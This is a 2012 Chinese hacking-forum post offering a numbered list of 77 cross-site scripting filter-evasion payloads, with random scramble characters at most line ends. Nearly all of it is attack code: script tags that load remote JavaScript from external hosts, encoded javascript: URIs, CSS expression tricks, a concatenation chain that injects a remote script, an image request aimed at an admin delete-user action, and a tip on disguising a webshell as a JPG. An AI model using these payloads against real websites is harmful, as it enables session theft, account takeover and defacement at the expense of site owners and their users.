找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2251|回复: 0
打印 上一主题 下一主题

xss详细利用大全1

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:04:56 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
跨站图片shell
) R0 D/ s; |. d9 T/ E, c! ^XSS跨站代码  <script>alert("")</script>( }* Z' f$ I$ u, q: w; C9 h: k
% Q% E4 o1 Q7 P
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马" M$ J( m1 F' L0 f  H9 x

; a/ r2 T# |# I9 h# }+ m9 f" o
' f: i/ r0 w4 |3 h; l& g- l
- N1 C; S$ L% f- B  W- ^! T: ]1)普通的XSS JavaScript注入
, U% b9 I9 P6 s6 W2 V: u7 @3 o<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>! Q2 F3 J' X& c# w( ?" p" F
( a3 e7 ~8 a6 V) C
(2)IMG标签XSS使用JavaScript命令# z, w3 x9 ?( ^" @
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
1 K( \6 e- F% d' s% O
6 R7 D) V2 D) f+ R( L(3)IMG标签无分号无引号- s  l7 Q7 v8 u+ ^! u
<IMG SRC=javascript:alert(‘XSS’)>; O; q3 z/ n' U. K

& B6 ]; ~; q- n; v3 E(4)IMG标签大小写不敏感$ }- f6 u0 C* M: ]0 a. P3 B
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>9 r% I5 t; n' I* {) F7 m6 c' |

% b& L8 _$ |" P. M(5)HTML编码(必须有分号)
) ^8 y2 s( {7 r, b& ]<IMG SRC=javascript:alert(“XSS”)>
& h% _4 q; J3 @; X3 I3 J" k# r$ ~, ?8 U: B
(6)修正缺陷IMG标签
) ?- }7 B  @0 A9 e# k<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
& c4 ?) m" t5 y! |: B. O4 d7 a3 h, \, c: W
(7)formCharCode标签(计算器)5 @4 L& G/ c, G
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>5 h. U& d, ?" Y3 T' v
! X- A' n! j. n; u6 ~
(8)UTF-8的Unicode编码(计算器)
5 k3 o1 D0 q# n( \<IMG SRC=jav..省略..S')>/ a* z% W% q0 g/ v" L& x- ?- e

5 C6 P3 C$ X& Q! ]* B* r$ X(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
3 j: F0 @" K6 ?5 c/ F% T  B2 {<IMG SRC=jav..省略..S')>0 a! J9 W$ ?/ ~
% h% d  C4 o: b2 T; l; o0 `
(10)十六进制编码也是没有分号(计算器), k( W* t! @) E& l% X5 L( g
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>
8 k4 b( v: d2 W0 N* R9 W  t
( K& O) ~; T% A5 c(11)嵌入式标签,将Javascript分开; K: c8 E4 A& `5 m; Z( a5 Z0 u
<IMG SRC=”jav ascript:alert(‘XSS’);”>+ j8 f4 f7 \6 d+ _" u
( D% d2 g. r+ k. _( E$ \5 f$ d
(12)嵌入式编码标签,将Javascript分开* G* ^# f' m  b; h
<IMG SRC=”jav ascript:alert(‘XSS’);”>3 {+ @6 S" R' E7 K$ {8 F! L# w- q
% c! D# T3 n' V7 N. U
(13)嵌入式换行符
: @3 i, c4 K" Q1 G% @: Z<IMG SRC=”jav ascript:alert(‘XSS’);”>: D: U. q5 t' ~3 r0 d/ g" B1 w
' ]5 Y( ?" V5 K# V
(14)嵌入式回车7 t& g5 B/ ]0 I, r1 e8 t
<IMG SRC=”jav ascript:alert(‘XSS’);”>
- D  Z1 c- K/ Z* f8 P6 W* ^  |* {2 a' \
(15)嵌入式多行注入JavaScript,这是XSS极端的例子7 Z* M3 G6 }0 D3 Z% D
<IMG SRC=”javascript:alert(‘XSS‘)”>6 f: \+ `; V. @. p
1 B' l" K  d% x" j1 G* J' s" ^3 c
(16)解决限制字符(要求同页面)
' }2 b: Q8 M; A+ ]# E: O<script>z=’document.’</script>
; b. B; s+ g4 p( }<script>z=z+’write(“‘</script>
2 @& N9 q7 o9 Q+ D, J/ P/ @* P- k<script>z=z+’<script’</script>
& j7 |  s0 O3 w<script>z=z+’ src=ht’</script>
3 K$ H% j; m5 H<script>z=z+’tp://ww’</script>
2 Z8 s  d' R2 e  ?, b<script>z=z+’w.shell’</script>" E/ O8 x- u4 x
<script>z=z+’.net/1.’</script>. N, V: c2 M9 `6 G" C# I
<script>z=z+’js></sc’</script>
  d9 z1 D+ z2 {' N) B7 X<script>z=z+’ript>”)’</script>9 c3 [) n+ X6 A+ n
<script>eval_r(z)</script>, |% d+ c/ ?) m% T

  h- O3 T/ G; R+ D" V+ Z4 B) k' H% Z(17)空字符, r! D9 D% T8 ~7 l- ?) o% B1 K- S
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out; F" f  b" E& G/ v( _2 g; d

' T) p& q+ p! O2 |2 y(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
& k6 o8 e, _; e( O, X% l% cperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out: d" j0 U0 _) O

+ K" i4 D/ n/ v6 z(19)Spaces和meta前的IMG标签6 \; {0 q: s' q( k; B: }4 n
<IMG SRC=” javascript:alert(‘XSS’);”>% N  k+ _* Y4 Q$ q; k
+ K" ?- ?3 t- j
(20)Non-alpha-non-digit XSS
+ V* t9 M( J* ^$ f) O<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
! Z* r3 j1 t: j; a- O0 ]6 a: Y, D: M) P  H* h
(21)Non-alpha-non-digit XSS to 2) D, w9 k' o+ G% ~. D
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
) f- G$ _8 E. w
' a3 }% o% D1 B) }- a9 N- E(22)Non-alpha-non-digit XSS to 3
. Q& b! m7 h) V1 D' e<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
9 z" U4 C4 r7 N+ k: t5 Y6 x& z' p( k! p8 B. _* r0 [
(23)双开括号
+ R% S; w" E$ f9 Z  q- _: r<<SCRIPT>alert(“XSS”);//<</SCRIPT>
7 N9 G% j$ ~# J* s' ]2 ^3 m8 N" m1 w3 C; [4 `1 o
(24)无结束脚本标记(仅火狐等浏览器): z9 |1 Y9 G0 ]' E
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>* Y9 I3 H# [& S& S/ z, W* |; }

4 e5 _! U9 V2 N: A(25)无结束脚本标记2$ K2 B2 g* V2 r& |/ ^0 ^
<SCRIPT SRC=//3w.org/XSS/xss.js>8 k- ^; H1 o+ U; p7 @& Z) Q# d6 E

) {2 J+ d; R( r8 k& S  v(26)半开的HTML/JavaScript XSS
0 @4 P8 R) p; r/ ?- f( A' _0 q# n<IMG SRC=”javascript:alert(‘XSS’)”$ ]3 C: K, K, M) J# H3 ?

4 C% A& B0 J! @* L0 |3 L/ M(27)双开角括号
) U4 [; ^% k2 [4 p3 A2 L<iframe src=http://3w.org/XSS.html <5 H. @4 }  H( i  x. P% Q( j

% {% ~' `# g; y9 l  h(28)无单引号 双引号 分号& z! m2 k3 d" V& g' ^( D, o* w
<SCRIPT>a=/XSS/
4 O& T9 s  f& Ialert(a.source)</SCRIPT>; {  o3 J( L# n( R, J5 n  N& \% q

6 E- a1 E7 v+ |(29)换码过滤的JavaScript2 x: U  B. q7 q0 n5 i
\”;alert(‘XSS’);//
2 q8 R# r) T8 B" n+ `
2 t* M5 N3 c9 z# r5 o1 I% m2 h( N(30)结束Title标签
* X1 C: x- k$ C  \; {0 h6 z* L</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
0 q# m; G7 x4 M. @- j* B0 F$ u
. w7 p( U. O' l; }(31)Input Image) I# V! f+ N( a
<INPUT SRC=”javascript:alert(‘XSS’);”>2 J1 \( p  ]& V+ n$ \
! P1 r( _/ `4 l4 ^+ w# o
(32)BODY Image7 k2 z0 s8 @1 ?! s  I. C8 S' I, n
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>+ d6 r( z& ]' J' O4 S5 }7 g( w

/ `4 U9 h0 x& c(33)BODY标签, p/ R8 C0 R7 k
<BODY(‘XSS’)>
5 q4 F. c: r6 A+ K2 `$ E5 r  g2 w8 B
(34)IMG Dynsrc
& \5 i% W& C1 f7 `, [! ]<IMG DYNSRC=”javascript:alert(‘XSS’)”>& I- Y# e+ X4 j; R

- z  `! j, C/ v' p8 p(35)IMG Lowsrc+ s, {4 r5 R, ~; C; S0 N5 _3 j. G! n
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
0 {# c3 g0 a8 d9 h5 Q! x# Y; ?6 t7 @; U3 j, l; e4 x
(36)BGSOUND
7 {* }4 ^) o7 J9 x" [  E<BGSOUND SRC=”javascript:alert(‘XSS’);”>
7 ^: k. B$ b# G) c4 a% @+ U9 D+ Z7 }, b. {1 Y
(37)STYLE sheet
: K: I  m( E7 C) Y# |. d<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>$ s1 ]( X$ \0 K( J1 t7 F9 H/ W

" ~5 N/ `, T$ f, o* `' a; {5 _(38)远程样式表, M5 I6 V. Z2 F# T8 g# G' A
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>- A- w5 S6 r) c3 h

4 G' t/ Z8 X- E6 {/ @(39)List-style-image(列表式)
+ z, ~2 I, v/ D2 ^8 V<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
9 N1 u$ _  z0 ~' ^: E
9 @2 ?. `0 b! H3 D4 S(40)IMG VBscript
# ?$ ^% n7 @( `  V( R) L5 {7 h. |* J! |( n<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
1 o7 M6 @! @% M6 a# N' O
/ ]% E  v4 i0 D! E6 J: e(41)META链接url* y! T2 W7 `% _
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
( G0 e" H; I9 S! A5 o! E5 V; ~( U1 X# [! L9 j7 U: v( t
(42)Iframe1 Y' ^+ H; V! J! _/ o/ H
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
6 v# `+ ^6 E1 y) Q' K* X  Q. I9 l(43)Frame
' B- Y/ ]/ p1 z) L8 E" }4 t<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
, [$ V7 t" c% v
- t9 M, [' t! O' m1 T5 |(44)Table
2 q3 K: t( b4 n2 i& ^<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
5 i/ M- |( F0 M1 Y9 B( Q/ F3 C; w' @* K4 ~$ `" J
(45)TD) E. i- c4 I6 H6 p: r
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>! `( T0 [* B0 x7 L. d) T7 \
9 {$ u( F% ]+ N6 g+ |1 W
(46)DIV background-image
, X0 O8 f0 v" Q+ V) _<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>- y: Q! S7 }' C) H9 G1 p9 N

( n; L9 [! _% ~+ l$ h9 m+ M(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
) L1 R3 O) W4 U. T$ W* V! g" k<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
: n1 ~0 M! ~& I7 H
3 \" @# O3 O# ~(48)DIV expression
+ l" p, R0 l# l1 A<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
4 {, p' _# t& r6 Q7 j+ n9 q
( l: G- G  L/ t' O' K! j(49)STYLE属性分拆表达: Q& V$ R9 y6 r# [1 z
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>' v* W* [- b* _! ?. j/ a5 B

" W5 k) `4 m( r8 D# c& K(50)匿名STYLE(组成:开角号和一个字母开头)7 {: o: S# X1 K  e) r
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>: p  _# K+ Y2 x6 F, \

% y) |6 j% s+ R8 S8 }* Y( N(51)STYLE background-image
& P" S4 s% l- d<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
0 O' V3 ^0 Y7 c8 G& f  r& x. g7 m7 m- l$ Y+ v
(52)IMG STYLE方式9 s! f# o3 E6 c9 A1 x9 ~4 n4 t, a( ^9 A
exppression(alert(“XSS”))’>! y, o. S: L$ r) G& _" {* b
( V2 `- n5 Z* d6 a% u
(53)STYLE background7 m3 `* C9 f5 |  w7 N' h2 G
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>8 G/ ^) Y6 N+ P

% E1 t8 l6 S: ?$ r) P(54)BASE
  p3 g( `' E2 ]) H4 K6 |<BASE HREF=”javascript:alert(‘XSS’);//”>/ V; O! t# J2 V; m5 w# N

0 H( T) Z8 A- U+ F(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS. k7 Z+ F0 d2 f
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>7 Q9 l' W8 y3 U- ?0 J& C
2 m5 c! K& H8 D6 j# M
(56)在flash中使用ActionScrpt可以混进你XSS的代码' i, _! Z* u* @( T7 k
a=”get”;$ K$ K" r4 b% b8 E0 q
b=”URL(\”";
8 _7 E) A2 x. R6 K. o% Z& r  Zc=”javascript:”;6 t2 b) d- E. x) _5 {0 `
d=”alert(‘XSS’);\”)”;0 W6 v: I0 M2 }6 A
eval_r(a+b+c+d);& |- `9 T- a, A& U2 _# c+ Z, S
$ M3 E2 s( I* ]8 B/ W) a0 V% ~$ Z% n
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
5 L4 ]9 h& |0 p2 {. w& [: M<HTML xmlns:xss>* Y- F  ?9 W, e
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>3 |" |4 O" ~: i) @, J
<xss:xss>XSS</xss:xss>% d9 c6 _7 s/ {; B/ U& b# t
</HTML>2 ^) D. o4 C8 ^" @, M- m% U
. D. j4 y/ O) G/ I% [0 b
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
& M3 M$ B* n' W: Z. }<SCRIPT SRC=””></SCRIPT>
/ q/ ?+ l) g6 b# |! t; J8 A" C8 |
: z. b+ {' Q6 ^  [* {(59)IMG嵌入式命令,可执行任意命令! o: s8 {) [; I
<IMG SRC=”http://www.XXX.com/a.php?a=b”>9 r' _& w# Q* v3 Q$ w0 f# |
( w$ k( P, V( s
(60)IMG嵌入式命令(a.jpg在同服务器)* ^: T$ I6 C) g1 I3 ^2 d( {
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
, N& b! g/ h0 G/ c" n. N% N+ o: p6 ^. d6 A* k
(61)绕符号过滤4 S8 ]# i: @& H) l2 g: h; w
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
! P, q$ c9 `) |4 i8 a
, n# f$ R3 F/ U) Z, @! a1 `(62)
: b' t2 Y3 y+ r% r" N) w8 `9 i<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>, {9 s5 O6 q& m

/ p% A" r: `" k$ t$ G3 {8 z(63)
6 O6 ~2 ~7 x2 v& m) X. e4 N<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>- z" L" @3 p  R: ~/ N7 u# Q
9 V4 X  s- v' {6 ~+ f
(64)& G, [, h0 `+ s( b
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
8 f- V5 ?' Y: K0 b0 |- N; j
/ W) M* ]* a" u' x, l' p) y6 z(65)
3 {2 g9 O7 h$ i3 Z0 ?& a" K  H" x- d<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
) g4 L( i- d# [' t* e) t: K
  ]( g5 {( E7 j8 I, m3 v# _(66)8 ]1 _7 t1 Y( Y" [) _
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
% d  L8 P3 l+ H& u/ Y8 }& I( ^( k- x6 t7 ?  E0 Y9 X2 _* I( R
(67)
" ^; F% R6 ~/ K9 C<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>  J  _' V) q& C' [

4 _8 j4 @! p) z9 q" Q3 ](68)URL绕行# B7 v5 h- @4 {- i# N" d# S8 m1 g
<A HREF=”http://127.0.0.1/”>XSS</A>
/ F1 ]: K3 p1 f9 b0 R1 x0 y. D3 R( f) `" R$ x8 B+ n2 V7 [. j  ^
(69)URL编码4 \( y5 g: r1 X2 X9 T  H" i+ @
<A HREF=”http://3w.org”>XSS</A>
; q$ N! R8 ^' p4 ?) l4 \; E$ c7 u5 }6 X) `  E. z, T
(70)IP十进制' U- V9 H: q9 m& A- T0 T) }" `# T
<A HREF=”http://3232235521″>XSS</A>
$ S/ U. d+ a; u4 {8 ?+ V2 q' n& x. U
(71)IP十六进制+ }+ a1 j! C" r; s( Q: q2 a# h
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
0 j& ?# f! v8 z2 a% c) B" Y: v! Z7 u% u7 X& O8 S
(72)IP八进制6 Z1 |$ F: ?2 j7 c% N/ |! m$ Q. ^
<A HREF=”http://0300.0250.0000.0001″>XSS</A>$ {9 ~+ O; F) A
$ F5 y+ a# G7 ], h& O: l8 @, d  ]
(73)混合编码
6 G- M0 [! ~" {& n  S" j<A HREF=”h6 |3 D; b# _7 a, ^
tt p://6 6.000146.0×7.147/”">XSS</A>8 u$ X% M* `3 B5 n$ M! R; z

! |! b/ C5 D, y, [4 }(74)节省[http:]
* |% m& D% O9 m1 m: _. @  ]<A HREF=”//www.google.com/”>XSS</A>
# k% V# T" ?+ E' l7 c1 E' v) Z$ P( V) y/ u& \+ ]
(75)节省[www], M( P# @' {( }, ]; G. Z
<A HREF=”http://google.com/”>XSS</A>
6 I8 [* b1 q! `& R
) e( U1 K. B/ V6 F6 Z) g, F(76)绝对点绝对DNS7 u" v0 i- G. e: E
<A HREF=”http://www.google.com./”>XSS</A>3 S. l7 b1 C$ |* X

9 }5 b* q) U5 x0 n0 f& z- z(77)javascript链接
) N! v4 h/ j1 x5 x  Q2 c4 ^<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
0 P% U: {- H3 N( @
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表